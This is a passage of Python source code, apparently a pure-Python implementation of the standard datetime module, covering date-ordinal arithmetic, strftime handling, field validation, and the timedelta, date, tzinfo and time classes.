"year, month -> number of days in year preceding first day of month."
assert 1 <= month <= 12, 'month must be in 1..12'
return _DAYS_BEFORE_MONTH[month] + (month > 2 and _is_leap(year))
def _ymd2ord(year, month, day):
"year, month, day -> ordinal, considering 01-Jan-0001 as day 1."
assert 1 <= month <= 12, 'month must be in 1..12'
dim = _days_in_month(year, month)
assert 1 <= day <= dim, ('day must be in 1..%d' % dim)
return (_days_before_year(year) +
_days_before_month(year, month) +
day)
_DI400Y = _days_before_year(401) # number of days in 400 years
_DI100Y = _days_before_year(101) # " " " " 100 "
_DI4Y = _days_before_year(5) # " " " " 4 "
# A 4-year cycle has an extra leap day over what we'd get from pasting
# together 4 single years.
assert _DI4Y == 4 * 365 + 1
# Similarly, a 400-year cycle has an extra leap day over what we'd get from
# pasting together 4 100-year cycles.
assert _DI400Y == 4 * _DI100Y + 1
# OTOH, a 100-year cycle has one fewer leap day than we'd get from
# pasting together 25 4-year cycles.
assert _DI100Y == 25 * _DI4Y - 1
def _ord2ymd(n):
"ordinal -> (year, month, day), considering 01-Jan-0001 as day 1."
# n is a 1-based index, starting at 1-Jan-1. The pattern of leap years
# repeats exactly every 400 years. The basic strategy is to find the
# closest 400-year boundary at or before n, then work with the offset
# from that boundary to n. Life is much clearer if we subtract 1 from
# n first -- then the values of n at 400-year boundaries are exactly
# those divisible by _DI400Y:
#
# D M Y n n-1
# -- --- ---- ---------- ----------------
# 31 Dec -400 -_DI400Y -_DI400Y -1
# 1 Jan -399 -_DI400Y +1 -_DI400Y 400-year boundary
# ...
# 30 Dec 000 -1 -2
# 31 Dec 000 0 -1
# 1 Jan 001 1 0 400-year boundary
# 2 Jan 001 2 1
# 3 Jan 001 3 2
# ...
# 31 Dec 400 _DI400Y _DI400Y -1
# 1 Jan 401 _DI400Y +1 _DI400Y 400-year boundary
n -= 1
n400, n = divmod(n, _DI400Y)
year = n400 * 400 + 1 # ..., -399, 1, 401, ...
# Now n is the (non-negative) offset, in days, from January 1 of year, to
# the desired date. Now compute how many 100-year cycles precede n.
# Note that it's possible for n100 to equal 4! In that case 4 full
# 100-year cycles precede the desired day, which implies the desired
# day is December 31 at the end of a 400-year cycle.
n100, n = divmod(n, _DI100Y)
# Now compute how many 4-year cycles precede it.
n4, n = divmod(n, _DI4Y)
# And now how many single years. Again n1 can be 4, and again meaning
# that the desired day is December 31 at the end of the 4-year cycle.
n1, n = divmod(n, 365)
year += n100 * 100 + n4 * 4 + n1
if n1 == 4 or n100 == 4:
assert n == 0
return year-1, 12, 31
# Now the year is correct, and n is the offset from January 1. We find
# the month via an estimate that's either exact or one too large.
leapyear = n1 == 3 and (n4 != 24 or n100 == 3)
assert leapyear == _is_leap(year)
month = (n + 50) >> 5
preceding = _DAYS_BEFORE_MONTH[month] + (month > 2 and leapyear)
if preceding > n: # estimate is too large
month -= 1
preceding -= _DAYS_IN_MONTH[month] + (month == 2 and leapyear)
n -= preceding
assert 0 <= n < _days_in_month(year, month)
# Now the year and month are correct, and n is the offset from the
# start of that month: we're done!
return year, month, n+1
# Month and day names. For localized versions, see the calendar module.
_MONTHNAMES = [None, "Jan", "Feb", "Mar", "Apr", "May", "Jun",
"Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
_DAYNAMES = [None, "Mon", "Tue", "Wed", "Thu", "Fri", "Sat", "Sun"]
def _build_struct_time(y, m, d, hh, mm, ss, dstflag):
wday = (_ymd2ord(y, m, d) + 6) % 7
dnum = _days_before_month(y, m) + d
return _time.struct_time((y, m, d, hh, mm, ss, wday, dnum, dstflag))
def _format_time(hh, mm, ss, us):
# Skip trailing microseconds when us==0.
result = "%02d:%02d:%02d" % (hh, mm, ss)
if us:
result += ".%06d" % us
return result
# Correctly substitute for %z and %Z escapes in strftime formats.
def _wrap_strftime(object, format, timetuple):
# Don't call utcoffset() or tzname() unless actually needed.
freplace = None # the string to use for %f
zreplace = None # the string to use for %z
Zreplace = None # the string to use for %Z
# Scan format for %z and %Z escapes, replacing as needed.
newformat = []
push = newformat.append
i, n = 0, len(format)
while i < n:
ch = format[i]
i += 1
if ch == '%':
if i < n:
ch = format[i]
i += 1
if ch == 'f':
if freplace is None:
freplace = '%06d' % getattr(object,
'microsecond', 0)
newformat.append(freplace)
elif ch == 'z':
if zreplace is None:
zreplace = ""
if hasattr(object, "utcoffset"):
offset = object.utcoffset()
if offset is not None:
sign = '+'
if offset.days < 0:
offset = -offset
sign = '-'
h, m = divmod(offset, timedelta(hours=1))
assert not m % timedelta(minutes=1), "whole minute"
m //= timedelta(minutes=1)
zreplace = '%c%02d%02d' % (sign, h, m)
assert '%' not in zreplace
newformat.append(zreplace)
elif ch == 'Z':
if Zreplace is None:
Zreplace = ""
if hasattr(object, "tzname"):
s = object.tzname()
if s is not None:
# strftime is going to have at this: escape %
Zreplace = s.replace('%', '%%')
newformat.append(Zreplace)
else:
push('%')
push(ch)
else:
push('%')
else:
push(ch)
newformat = "".join(newformat)
return _time.strftime(newformat, timetuple)
def _call_tzinfo_method(tzinfo, methname, tzinfoarg):
if tzinfo is None:
return None
return getattr(tzinfo, methname)(tzinfoarg)
# Just raise TypeError if the arg isn't None or a string.
def _check_tzname(name):
if name is not None and not isinstance(name, str):
raise TypeError("tzinfo.tzname() must return None or string, "
"not '%s'" % type(name))
# name is the offset-producing method, "utcoffset" or "dst".
# offset is what it returned.
# If offset isn't None or timedelta, raises TypeError.
# If offset is None, returns None.
# Else offset is checked for being in range, and a whole # of minutes.
# If it is, its integer value is returned. Else ValueError is raised.
def _check_utc_offset(name, offset):
assert name in ("utcoffset", "dst")
if offset is None:
return
if not isinstance(offset, timedelta):
raise TypeError("tzinfo.%s() must return None "
"or timedelta, not '%s'" % (name, type(offset)))
if offset % timedelta(minutes=1) or offset.microseconds:
raise ValueError("tzinfo.%s() must return a whole number "
"of minutes, got %s" % (name, offset))
if not -timedelta(1) < offset < timedelta(1):
raise ValueError("%s()=%s, must be must be strictly between"
" -timedelta(hours=24) and timedelta(hours=24)"
% (name, offset))
def _check_date_fields(year, month, day):
if not isinstance(year, int):
raise TypeError('int expected')
if not MINYEAR <= year <= MAXYEAR:
raise ValueError('year must be in %d..%d' % (MINYEAR, MAXYEAR), year)
if not 1 <= month <= 12:
raise ValueError('month must be in 1..12', month)
dim = _days_in_month(year, month)
if not 1 <= day <= dim:
raise ValueError('day must be in 1..%d' % dim, day)
def _check_time_fields(hour, minute, second, microsecond):
if not isinstance(hour, int):
raise TypeError('int expected')
if not 0 <= hour <= 23:
raise ValueError('hour must be in 0..23', hour)
if not 0 <= minute <= 59:
raise ValueError('minute must be in 0..59', minute)
if not 0 <= second <= 59:
raise ValueError('second must be in 0..59', second)
if not 0 <= microsecond <= 999999:
raise ValueError('microsecond must be in 0..999999', microsecond)
def _check_tzinfo_arg(tz):
if tz is not None and not isinstance(tz, tzinfo):
raise TypeError("tzinfo argument must be None or of a tzinfo subclass")
def _cmperror(x, y):
raise TypeError("can't compare '%s' to '%s'" % (
type(x).__name__, type(y).__name__))
class timedelta:
"""Represent the difference between two datetime objects.
Supported operators:
- add, subtract timedelta
- unary plus, minus, abs
- compare to timedelta
- multiply, divide by int
In addition, datetime supports subtraction of two datetime objects
returning a timedelta, and addition or subtraction of a datetime
and a timedelta giving a datetime.
Representation: (days, seconds, microseconds). Why? Because I
felt like it.
"""
__slots__ = '_days', '_seconds', '_microseconds'
def __new__(cls, days=0, seconds=0, microseconds=0,
milliseconds=0, minutes=0, hours=0, weeks=0):
# Doing this efficiently and accurately in C is going to be difficult
# and error-prone, due to ubiquitous overflow possibilities, and that
# C double doesn't have enough bits of precision to represent
# microseconds over 10K years faithfully. The code here tries to make
# explicit where go-fast assumptions can be relied on, in order to
# guide the C implementation; it's way more convoluted than speed-
# ignoring auto-overflow-to-long idiomatic Python could be.
# XXX Check that all inputs are ints or floats.
# Final values, all integer.
# s and us fit in 32-bit signed ints; d isn't bounded.
d = s = us = 0
# Normalize everything to days, seconds, microseconds.
days += weeks*7
seconds += minutes*60 + hours*3600
microseconds += milliseconds*1000
# Get rid of all fractions, and normalize s and us.
# Take a deep breath <wink>.
if isinstance(days, float):
dayfrac, days = _math.modf(days)
daysecondsfrac, daysecondswhole = _math.modf(dayfrac * (24.*3600.))
assert daysecondswhole == int(daysecondswhole) # can't overflow
s = int(daysecondswhole)
assert days == int(days)
d = int(days)
else:
daysecondsfrac = 0.0
d = days
assert isinstance(daysecondsfrac, float)
assert abs(daysecondsfrac) <= 1.0
assert isinstance(d, int)
assert abs(s) <= 24 * 3600
# days isn't referenced again before redefinition
if isinstance(seconds, float):
secondsfrac, seconds = _math.modf(seconds)
assert seconds == int(seconds)
seconds = int(seconds)
secondsfrac += daysecondsfrac
assert abs(secondsfrac) <= 2.0
else:
secondsfrac = daysecondsfrac
# daysecondsfrac isn't referenced again
assert isinstance(secondsfrac, float)
assert abs(secondsfrac) <= 2.0
assert isinstance(seconds, int)
days, seconds = divmod(seconds, 24*3600)
d += days
s += int(seconds) # can't overflow
assert isinstance(s, int)
assert abs(s) <= 2 * 24 * 3600
# seconds isn't referenced again before redefinition
usdouble = secondsfrac * 1e6
assert abs(usdouble) < 2.1e6 # exact value not critical
# secondsfrac isn't referenced again
if isinstance(microseconds, float):
microseconds += usdouble
microseconds = round(microseconds, 0)
seconds, microseconds = divmod(microseconds, 1e6)
assert microseconds == int(microseconds)
assert seconds == int(seconds)
days, seconds = divmod(seconds, 24.*3600.)
assert days == int(days)
assert seconds == int(seconds)
d += int(days)
s += int(seconds) # can't overflow
assert isinstance(s, int)
assert abs(s) <= 3 * 24 * 3600
else:
seconds, microseconds = divmod(microseconds, 1000000)
days, seconds = divmod(seconds, 24*3600)
d += days
s += int(seconds) # can't overflow
assert isinstance(s, int)
assert abs(s) <= 3 * 24 * 3600
microseconds = float(microseconds)
microseconds += usdouble
microseconds = round(microseconds, 0)
assert abs(s) <= 3 * 24 * 3600
assert abs(microseconds) < 3.1e6
# Just a little bit of carrying possible for microseconds and seconds.
assert isinstance(microseconds, float)
assert int(microseconds) == microseconds
us = int(microseconds)
seconds, us = divmod(us, 1000000)
s += seconds # cant't overflow
assert isinstance(s, int)
days, s = divmod(s, 24*3600)
d += days
assert isinstance(d, int)
assert isinstance(s, int) and 0 <= s < 24*3600
assert isinstance(us, int) and 0 <= us < 1000000
self = object.__new__(cls)
self._days = d
self._seconds = s
self._microseconds = us
if abs(d) > 999999999:
raise OverflowError("timedelta # of days is too large: %d" % d)
return self
def __repr__(self):
if self._microseconds:
return "%s(%d, %d, %d)" % ('datetime.' + self.__class__.__name__,
self._days,
self._seconds,
self._microseconds)
if self._seconds:
return "%s(%d, %d)" % ('datetime.' + self.__class__.__name__,
self._days,
self._seconds)
return "%s(%d)" % ('datetime.' + self.__class__.__name__, self._days)
def __str__(self):
mm, ss = divmod(self._seconds, 60)
hh, mm = divmod(mm, 60)
s = "%d:%02d:%02d" % (hh, mm, ss)
if self._days:
def plural(n):
return n, abs(n) != 1 and "s" or ""
s = ("%d day%s, " % plural(self._days)) + s
if self._microseconds:
s = s + ".%06d" % self._microseconds
return s
def total_seconds(self):
"""Total seconds in the duration."""
return ((self.days * 86400 + self.seconds)*10**6 +
self.microseconds) / 10**6
# Read-only field accessors
@property
def days(self):
"""days"""
return self._days
@property
def seconds(self):
"""seconds"""
return self._seconds
@property
def microseconds(self):
"""microseconds"""
return self._microseconds
def __add__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days + other._days,
self._seconds + other._seconds,
self._microseconds + other._microseconds)
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
if isinstance(other, timedelta):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days - other._days,
self._seconds - other._seconds,
self._microseconds - other._microseconds)
return NotImplemented
def __rsub__(self, other):
if isinstance(other, timedelta):
return -self + other
return NotImplemented
def __neg__(self):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(-self._days,
-self._seconds,
-self._microseconds)
def __pos__(self):
return self
def __abs__(self):
if self._days < 0:
return -self
else:
return self
def __mul__(self, other):
if isinstance(other, int):
# for CPython compatibility, we cannot use
# our __class__ here, but need a real timedelta
return timedelta(self._days * other,
self._seconds * other,
self._microseconds * other)
if isinstance(other, float):
a, b = other.as_integer_ratio()
return self * a / b
return NotImplemented
__rmul__ = __mul__
def _to_microseconds(self):
return ((self._days * (24*3600) + self._seconds) * 1000000 +
self._microseconds)
def __floordiv__(self, other):
if not isinstance(other, (int, timedelta)):
return NotImplemented
usec = self._to_microseconds()
if isinstance(other, timedelta):
return usec // other._to_microseconds()
if isinstance(other, int):
return timedelta(0, 0, usec // other)
def __truediv__(self, other):
if not isinstance(other, (int, float, timedelta)):
return NotImplemented
usec = self._to_microseconds()
if isinstance(other, timedelta):
return usec / other._to_microseconds()
if isinstance(other, int):
return timedelta(0, 0, usec / other)
if isinstance(other, float):
a, b = other.as_integer_ratio()
return timedelta(0, 0, b * usec / a)
def __mod__(self, other):
if isinstance(other, timedelta):
r = self._to_microseconds() % other._to_microseconds()
return timedelta(0, 0, r)
return NotImplemented
def __divmod__(self, other):
if isinstance(other, timedelta):
q, r = divmod(self._to_microseconds(),
other._to_microseconds())
return q, timedelta(0, 0, r)
return NotImplemented
# Comparisons of timedelta objects with other.
def __eq__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) == 0
else:
return False
def __ne__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) != 0
else:
return True
def __le__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, timedelta):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other):
assert isinstance(other, timedelta)
return _cmp(self._getstate(), other._getstate())
def __hash__(self):
return hash(self._getstate())
def __bool__(self):
return (self._days != 0 or
self._seconds != 0 or
self._microseconds != 0)
# Pickle support.
def _getstate(self):
return (self._days, self._seconds, self._microseconds)
def __reduce__(self):
return (self.__class__, self._getstate())
timedelta.min = timedelta(-999999999)
timedelta.max = timedelta(days=999999999, hours=23, minutes=59, seconds=59,
microseconds=999999)
timedelta.resolution = timedelta(microseconds=1)
class date:
"""Concrete date type.
Constructors:
__new__()
fromtimestamp()
today()
fromordinal()
Operators:
__repr__, __str__
__cmp__, __hash__
__add__, __radd__, __sub__ (add/radd only with timedelta arg)
Methods:
timetuple()
toordinal()
weekday()
isoweekday(), isocalendar(), isoformat()
ctime()
strftime()
Properties (readonly):
year, month, day
"""
__slots__ = '_year', '_month', '_day'
def __new__(cls, year, month=None, day=None):
"""Constructor.
Arguments:
year, month, day (required, base 1)
"""
if (isinstance(year, bytes) and len(year) == 4 and
1 <= year[2] <= 12 and month is None): # Month is sane
# Pickle support
self = object.__new__(cls)
self.__setstate(year)
return self
_check_date_fields(year, month, day)
self = object.__new__(cls)
self._year = year
self._month = month
self._day = day
return self
# Additional constructors
@classmethod
def fromtimestamp(cls, t):
"Construct a date from a POSIX timestamp (like time.time())."
y, m, d, hh, mm, ss, weekday, jday, dst = _time.localtime(t)
return cls(y, m, d)
@classmethod
def today(cls):
"Construct a date from time.time()."
t = _time.time()
return cls.fromtimestamp(t)
@classmethod
def fromordinal(cls, n):
"""Contruct a date from a proleptic Gregorian ordinal.
January 1 of year 1 is day 1. Only the year, month and day are
non-zero in the result.
"""
y, m, d = _ord2ymd(n)
return cls(y, m, d)
# Conversions to string
def __repr__(self):
"""Convert to formal string, for repr().
>>> dt = datetime(2010, 1, 1)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0)'
>>> dt = datetime(2010, 1, 1, tzinfo=timezone.utc)
>>> repr(dt)
'datetime.datetime(2010, 1, 1, 0, 0, tzinfo=datetime.timezone.utc)'
"""
return "%s(%d, %d, %d)" % ('datetime.' + self.__class__.__name__,
self._year,
self._month,
self._day)
# XXX These shouldn't depend on time.localtime(), because that
# clips the usable dates to [1970 .. 2038). At least ctime() is
# easily done without using strftime() -- that's better too because
# strftime("%c", ...) is locale specific.
def ctime(self):
"Return ctime() style string."
weekday = self.toordinal() % 7 or 7
return "%s %s %2d 00:00:00 %04d" % (
_DAYNAMES[weekday],
_MONTHNAMES[self._month],
self._day, self._year)
def strftime(self, fmt):
"Format using strftime()."
return _wrap_strftime(self, fmt, self.timetuple())
def __format__(self, fmt):
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
def isoformat(self):
"""Return the date formatted according to ISO.
This is 'YYYY-MM-DD'.
References:
- http://www.w3.org/TR/NOTE-datetime
- http://www.cl.cam.ac.uk/~mgk25/iso-time.html
"""
return "%04d-%02d-%02d" % (self._year, self._month, self._day)
__str__ = isoformat
# Read-only field accessors
@property
def year(self):
"""year (1-9999)"""
return self._year
@property
def month(self):
"""month (1-12)"""
return self._month
@property
def day(self):
"""day (1-31)"""
return self._day
# Standard conversions, __cmp__, __hash__ (and helpers)
def timetuple(self):
"Return local time tuple compatible with time.localtime()."
return _build_struct_time(self._year, self._month, self._day,
0, 0, 0, -1)
def toordinal(self):
"""Return proleptic Gregorian ordinal for the year, month and day.
January 1 of year 1 is day 1. Only the year, month and day values
contribute to the result.
"""
return _ymd2ord(self._year, self._month, self._day)
def replace(self, year=None, month=None, day=None):
"""Return a new date with new values for the specified fields."""
if year is None:
year = self._year
if month is None:
month = self._month
if day is None:
day = self._day
_check_date_fields(year, month, day)
return date(year, month, day)
# Comparisons of date objects with other.
def __eq__(self, other):
if isinstance(other, date):
return self._cmp(other) == 0
return NotImplemented
def __ne__(self, other):
if isinstance(other, date):
return self._cmp(other) != 0
return NotImplemented
def __le__(self, other):
if isinstance(other, date):
return self._cmp(other) <= 0
return NotImplemented
def __lt__(self, other):
if isinstance(other, date):
return self._cmp(other) < 0
return NotImplemented
def __ge__(self, other):
if isinstance(other, date):
return self._cmp(other) >= 0
return NotImplemented
def __gt__(self, other):
if isinstance(other, date):
return self._cmp(other) > 0
return NotImplemented
def _cmp(self, other):
assert isinstance(other, date)
y, m, d = self._year, self._month, self._day
y2, m2, d2 = other._year, other._month, other._day
return _cmp((y, m, d), (y2, m2, d2))
def __hash__(self):
"Hash."
return hash(self._getstate())
# Computations
def __add__(self, other):
"Add a date to a timedelta."
if isinstance(other, timedelta):
o = self.toordinal() + other.days
if 0 < o <= _MAXORDINAL:
return date.fromordinal(o)
raise OverflowError("result out of range")
return NotImplemented
__radd__ = __add__
def __sub__(self, other):
"""Subtract two dates, or a date and a timedelta."""
if isinstance(other, timedelta):
return self + timedelta(-other.days)
if isinstance(other, date):
days1 = self.toordinal()
days2 = other.toordinal()
return timedelta(days1 - days2)
return NotImplemented
def weekday(self):
"Return day of the week, where Monday == 0 ... Sunday == 6."
return (self.toordinal() + 6) % 7
# Day-of-the-week and week-of-the-year, according to ISO
def isoweekday(self):
"Return day of the week, where Monday == 1 ... Sunday == 7."
# 1-Jan-0001 is a Monday
return self.toordinal() % 7 or 7
def isocalendar(self):
"""Return a 3-tuple containing ISO year, week number, and weekday.
The first ISO week of the year is the (Mon-Sun) week
containing the year's first Thursday; everything else derives
from that.
The first week is 1; Monday is 1 ... Sunday is 7.
ISO calendar algorithm taken from
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
"""
year = self._year
week1monday = _isoweek1monday(year)
today = _ymd2ord(self._year, self._month, self._day)
# Internally, week and day have origin 0
week, day = divmod(today - week1monday, 7)
if week < 0:
year -= 1
week1monday = _isoweek1monday(year)
week, day = divmod(today - week1monday, 7)
elif week >= 52:
if today >= _isoweek1monday(year+1):
year += 1
week = 0
return year, week+1, day+1
# Pickle support.
def _getstate(self):
yhi, ylo = divmod(self._year, 256)
return bytes([yhi, ylo, self._month, self._day]),
def __setstate(self, string):
if len(string) != 4 or not (1 <= string[2] <= 12):
raise TypeError("not enough arguments")
yhi, ylo, self._month, self._day = string
self._year = yhi * 256 + ylo
def __reduce__(self):
return (self.__class__, self._getstate())
_date_class = date # so functions w/ args named "date" can get at the class
date.min = date(1, 1, 1)
date.max = date(9999, 12, 31)
date.resolution = timedelta(days=1)
class tzinfo:
"""Abstract base class for time zone info classes.
Subclasses must override the name(), utcoffset() and dst() methods.
"""
__slots__ = ()
def tzname(self, dt):
"datetime -> string name of time zone."
raise NotImplementedError("tzinfo subclass must override tzname()")
def utcoffset(self, dt):
"datetime -> minutes east of UTC (negative for west of UTC)"
raise NotImplementedError("tzinfo subclass must override utcoffset()")
def dst(self, dt):
"""datetime -> DST offset in minutes east of UTC.
Return 0 if DST not in effect. utcoffset() must include the DST
offset.
"""
raise NotImplementedError("tzinfo subclass must override dst()")
def fromutc(self, dt):
"datetime in UTC -> datetime in local time."
if not isinstance(dt, datetime):
raise TypeError("fromutc() requires a datetime argument")
if dt.tzinfo is not self:
raise ValueError("dt.tzinfo is not self")
dtoff = dt.utcoffset()
if dtoff is None:
raise ValueError("fromutc() requires a non-None utcoffset() "
"result")
# See the long comment block at the end of this file for an
# explanation of this algorithm.
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc() requires a non-None dst() result")
delta = dtoff - dtdst
if delta:
dt += delta
dtdst = dt.dst()
if dtdst is None:
raise ValueError("fromutc(): dt.dst gave inconsistent "
"results; cannot convert")
return dt + dtdst
# Pickle support.
def __reduce__(self):
getinitargs = getattr(self, "__getinitargs__", None)
if getinitargs:
args = getinitargs()
else:
args = ()
getstate = getattr(self, "__getstate__", None)
if getstate:
state = getstate()
else:
state = getattr(self, "__dict__", None) or None
if state is None:
return (self.__class__, args)
else:
return (self.__class__, args, state)
_tzinfo_class = tzinfo
class time:
"""Time with time zone.
Constructors:
__new__()
Operators:
__repr__, __str__
__cmp__, __hash__
Methods:
strftime()
isoformat()
utcoffset()
tzname()
dst()
Properties (readonly):
hour, minute, second, microsecond, tzinfo
"""
def __new__(cls, hour=0, minute=0, second=0, microsecond=0, tzinfo=None):
"""Constructor.
Arguments:
hour, minute (required)
second, microsecond (default to zero)
tzinfo (default to None)
"""
self = object.__new__(cls)
if isinstance(hour, bytes) and len(hour) == 6:
# Pickle support
self.__setstate(hour, minute or None)
return self
_check_tzinfo_arg(tzinfo)
_check_time_fields(hour, minute, second, microsecond)
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
return self
# Read-only field accessors
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
# Standard conversions, __hash__ (and helpers)
# Comparisons of time objects with other.
def __eq__(self, other):
if isinstance(other, time):
return self._cmp(other, allow_mixed=True) == 0
else:
return False
def __ne__(self, other):
if isinstance(other, time):
return self._cmp(other, allow_mixed=True) != 0
else:
return True
def __le__(self, other):
if isinstance(other, time):
return self._cmp(other) <= 0
else:
_cmperror(self, other)
def __lt__(self, other):
if isinstance(other, time):
return self._cmp(other) < 0
else:
_cmperror(self, other)
def __ge__(self, other):
if isinstance(other, time):
return self._cmp(other) >= 0
else:
_cmperror(self, other)
def __gt__(self, other):
if isinstance(other, time):
return self._cmp(other) > 0
else:
_cmperror(self, other)
def _cmp(self, other, allow_mixed=False):
assert isinstance(other, time)
mytz = self._tzinfo
ottz = other._tzinfo
myoff = otoff = None
if mytz is ottz:
base_compare = True
else:
myoff = self.utcoffset()
otoff = other.utcoffset()
base_compare = myoff == otoff
if base_compare:
return _cmp((self._hour, self._minute, self._second,
self._microsecond),
(other._hour, other._minute, other._second,
other._microsecond))
if myoff is None or otoff is None:
if allow_mixed:
return 2 # arbitrary non-zero value
else:
raise TypeError("cannot compare naive and aware times")
myhhmm = self._hour * 60 + self._minute - myoff//timedelta(minutes=1)
othhmm = other._hour * 60 + other._minute - otoff//timedelta(minutes=1)
return _cmp((myhhmm, self._second, self._microsecond),
(othhmm, other._second, other._microsecond))
def __hash__(self):
"""Hash."""
tzoff = self.utcoffset()
if not tzoff: # zero or None
return hash(self._getstate()[0])
h, m = divmod(timedelta(hours=self.hour, minutes=self.minute) - tzoff,
timedelta(hours=1))
assert not m % timedelta(minutes=1), "whole minute"
m //= timedelta(minutes=1)
if 0 <= h < 24:
return hash(time(h, m, self.second, self.microsecond))
return hash((h, m, self.second, self.microsecond))
# Conversion to string
def _tzstr(self, sep=":"):
"""Return formatted timezone offset (+xx:xx) or None."""
off = self.utcoffset()
if off is not None:
if off.days < 0:
sign = "-"
off = -off
else:
sign = "+"
hh, mm = divmod(off, timedelta(hours=1))
assert not mm % timedelta(minutes=1), "whole minute"
mm //= timedelta(minutes=1)
assert 0 <= hh < 24
off = "%s%02d%s%02d" % (sign, hh, sep, mm)
return off
def __repr__(self):
"""Convert to formal string, for repr()."""
if self._microsecond != 0:
s = ", %d, %d" % (self._second, self._microsecond)
elif self._second != 0:
s = ", %d" % self._second
else:
s = ""
s= "%s(%d, %d%s)" % ('datetime.' + self.__class__.__name__,
self._hour, self._minute, s)
if self._tzinfo is not None:
assert s[-1:] == ")"
s = s[:-1] + ", tzinfo=%r" % self._tzinfo + ")"
return s
def isoformat(self):
"""Return the time formatted according to ISO.
This is 'HH:MM:SS.mmmmmm+zz:zz', or 'HH:MM:SS+zz:zz' if
self.microsecond == 0.
"""
s = _format_time(self._hour, self._minute, self._second,
self._microsecond)
tz = self._tzstr()
if tz:
s += tz
return s
__str__ = isoformat
def strftime(self, fmt):
"""Format using strftime(). The date part of the timestamp passed
to underlying strftime should not be used.
"""
# The year must be >= 1000 else Python's strftime implementation
# can raise a bogus exception.
timetuple = (1900, 1, 1,
self._hour, self._minute, self._second,
0, 1, -1)
return _wrap_strftime(self, fmt, timetuple)
def __format__(self, fmt):
if len(fmt) != 0:
return self.strftime(fmt)
return str(self)
# Timezone functions
def utcoffset(self):
"""Return the timezone offset in minutes east of UTC (negative west of
UTC)."""
if self._tzinfo is None:
return None
offset = self._tzinfo.utcoffset(None)
_check_utc_offset("utcoffset", offset)
return offset
def tzname(self):
"""Return the timezone name.
Note that the name is 100% informational -- there's no requirement that
it mean anything in particular. For example, "GMT", "UTC", "-500",
"-5:00", "EDT", "US/Eastern", "America/New York" are all valid replies.
"""
if self._tzinfo is None:
return None
name = self._tzinfo.tzname(None)
_check_tzname(name)
return name
def dst(self):
"""Return 0 if DST is not in effect, or the DST offset (in minutes
eastward) if DST is in effect.
This is purely informational; the DST offset has already been added to
the UTC offset returned by utcoffset() if applicable, so there's no
need to consult dst() unless you're interested in displaying the DST
info.
"""
if self._tzinfo is None:
return None
offset = self._tzinfo.dst(None)
_check_utc_offset("dst", offset)
return offset
def replace(self, hour=None, minute=None, second=None, microsecond=None,
tzinfo=True):
"""Return a new time with new values for the specified fields."""
if hour is None:
hour = self.hour
if minute is None:
minute = self.minute
if second is None:
second = self.second
if microsecond is None:
microsecond = self.microsecond
if tzinfo is True:
tzinfo = self.tzinfo
_check_time_fields(hour, minute, second, microsecond)
_check_tzinfo_arg(tzinfo)
return time(hour, minute, second, microsecond, tzinfo)
def __bool__(self):
if self.second or self.microsecond:
return True
offset = self.utcoffset() or timedelta(0)
return timedelta(hours=self.hour, minutes=self.minute) != offset
# Pickle support.
def _getstate(self):
us2, us3 = divmod(self._microsecond, 256)
us1, us2 = divmod(us2, 256)
basestate = bytes([self._hour, self._minute, self._second,
us1, us2, us3])
if self._tzinfo is None:
return (basestate,)
else:
return (basestate, self._tzinfo)
def __setstate(self, string, tzinfo):
if len(string) != 6 or string[0] >= 24:
raise TypeError("an integer is required")
(self._hour, self._minute, self._second,
us1, us2, us3) = string
self._microsecond = (((us1 << 8) | us2) << 8) | us3
if tzinfo is None or isinstance(tzinfo, _tzinfo_class):
self._tzinfo = tzinfo
else:
raise TypeError("bad tzinfo state arg %r" % tzinfo)
def __reduce__(self):
return (time, self._getstate())
_time_class = time # so functions w/ args named "time" can get at the class
time.min = time(0, 0, 0)
time.max = time(23, 59, 59, 999999)
time.resolution = timedelta(microseconds=1)
class datetime(date):
"""datetime(year, month, day[, hour[, minute[, second[, microsecond[,tzinfo]]]]])
The year, month and day arguments are required. tzinfo may be None, or an
instance of a tzinfo subclass. The remaining arguments may be ints.
"""
__slots__ = date.__slots__ + (
'_hour', '_minute', '_second',
'_microsecond', '_tzinfo')
def __new__(cls, year, month=None, day=None, hour=0, minute=0, second=0,
microsecond=0, tzinfo=None):
if isinstance(year, bytes) and len(year) == 10:
# Pickle support
self = date.__new__(cls, year[:4])
self.__setstate(year, month)
return self
_check_tzinfo_arg(tzinfo)
_check_time_fields(hour, minute, second, microsecond)
self = date.__new__(cls, year, month, day)
self._hour = hour
self._minute = minute
self._second = second
self._microsecond = microsecond
self._tzinfo = tzinfo
return self
# Read-only field accessors
@property
def hour(self):
"""hour (0-23)"""
return self._hour
@property
def minute(self):
"""minute (0-59)"""
return self._minute
@property
def second(self):
"""second (0-59)"""
return self._second
@property
def microsecond(self):
"""microsecond (0-999999)"""
return self._microsecond
@property
def tzinfo(self):
"""timezone info object"""
return self._tzinfo
@classmethod
def fromtimestamp(cls, t, tz=None):
"""Construct a datetime from a POSIX timestamp (like time.time()).
A timezone info object may be passed in as well.
"""
_check_tzinfo_arg(tz)
converter = _time.localtime if tz is None else _time.gmtime
t, frac = divmod(t, 1.0)
us = int(frac * 1e6)
# If timestamp is less than one microsecond smaller than a
# full second, us can be rounded up to 1000000. In this case,
